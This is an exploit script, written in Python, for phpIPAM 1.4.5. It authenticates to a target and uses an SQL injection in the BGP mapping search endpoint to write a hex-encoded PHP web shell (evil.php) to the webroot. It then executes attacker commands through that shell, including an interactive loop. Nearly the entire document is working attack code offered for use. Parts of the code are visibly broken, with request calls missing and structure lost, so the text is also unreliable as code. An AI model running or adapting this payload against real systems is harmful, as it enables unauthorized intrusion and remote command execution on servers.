# Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)  
# Date: 2022-04-10  
# Exploit Author: Guilherme '@behiNdyk1' Alves  
# Vendor Homepage:  
# Software Link:  
# Version: 1.4.5  
# Tested on: Linux Ubuntu 20.04.3 LTS  
#!/usr/bin/env python3  
import requests  
import argparse  
from sys import exit, argv  
from termcolor import colored  
banner = """  
โ–ˆโ–€โ–ˆ โ–ˆโ–‘โ–ˆ โ–ˆโ–€โ–ˆ โ–ˆ โ–ˆโ–€โ–ˆ โ–„โ–€โ–ˆ โ–ˆโ–€โ–„โ–€โ–ˆ โ–„โ–ˆ โ–‘ โ–ˆโ–‘โ–ˆ โ–‘ โ–ˆโ–€ โ–ˆโ–€ โ–ˆโ–€โ–ˆ โ–ˆโ–‘โ–‘ โ–ˆ โ–€โ–ˆโ–€ โ–ˆโ–€โ–ˆ โ–ˆโ–€โ–ˆ โ–ˆโ–€โ–€ โ–ˆโ–€โ–€  
โ–ˆโ–€โ–€ โ–ˆโ–€โ–ˆ โ–ˆโ–€โ–€ โ–ˆ โ–ˆโ–€โ–€ โ–ˆโ–€โ–ˆ โ–ˆโ–‘โ–€โ–‘โ–ˆ โ–‘โ–ˆ โ–„ โ–€โ–€โ–ˆ โ–„ โ–„โ–ˆ โ–„โ–ˆ โ–€โ–€โ–ˆ โ–ˆโ–„โ–„ โ–ˆ โ–‘โ–ˆโ–‘ โ–ˆโ–„โ–ˆ โ–ˆโ–€โ–„ โ–ˆโ–„โ–„ โ–ˆโ–ˆโ–„  
โ–ˆโ–„โ–„ โ–ˆโ–„โ–ˆ โ–ˆโ–„โ–„ โ–ˆโ–€โ–€ โ–ˆโ–‘โ–ˆ โ–ˆ โ–ˆโ–„โ–‘โ–ˆ โ–ˆโ–€โ–„ โ–ˆโ–„โ–ˆ โ–ˆโ–€ โ–ˆโ–€โ–€ โ–ˆโ–€โ–€  
โ–ˆโ–„โ–ˆ โ–‘โ–ˆโ–‘ โ–ˆโ–„โ–ˆ โ–ˆโ–ˆโ–„ โ–ˆโ–€โ–ˆ โ–ˆ โ–ˆโ–‘โ–€โ–ˆ โ–ˆโ–„โ–€ โ–‘โ–ˆโ–‘ โ–„โ–ˆ โ–ˆโ–ˆโ–„ โ–ˆโ–„โ–„\n"""  
parser = argparse.ArgumentParser(usage="./ -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")  
parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)  
parser.add_argument("-usr", type=str, help="Username to log in as", required=True)  
parser.add_argument("-pwd", type=str, help="User's password", required=True)  
parser.add_argument("-cmd", type=str, help="Command to execute", default="id")  
parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")  
parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")  
args = parser.parse_args()  
url = args.url  
username = args.usr  
password = args.pwd  
command = args.cmd  
path = args.path  
# Validating url  
if url.endswith("/"):  
url = url[:-1]  
if not url.startswith("http://") and not url.startswith("https://"):  
print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))  
def login(url, username, password):  
"""Takes an username and a password and tries to execute a login (IPAM)"""  
data = {  
"ipamusername": username,  
"ipampassword": password  
print(colored(f"[...] Trying to log in as {username}", "blue"))  
r ="{url}/app/login/login_check.php", data=data)  
if "Invalid username or password" in r.text:  
print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))  
print(colored("[+] Login successful!", "green"))  
return str(r.cookies['phpipam'])  
auth_cookie = login(url, username, password)  
def exploit(url, auth_cookie, path, command):  
print(colored("[...] Exploiting", "blue"))  
vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"  
data = {  
"subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",  
"bgp_id": "1"  
cookies = {  
"phpipam": auth_cookie  
}"{url}/{vulnerable_path}", data=data, cookies=cookies)  
test = requests.get(f"{url}/evil.php")  
if test.status_code != 200:  
return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red"))  
if "--shell" in argv:  
while True:  
command = input("Shell> ")  
r = requests.get(f"{url}/evil.php?cmd={command}")  
print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))  
r = requests.get(f"{url}/evil.php?cmd={command}")  
print(f"\n\n[+] Output:\n{r.text}")  
exploit(url, auth_cookie, path, command)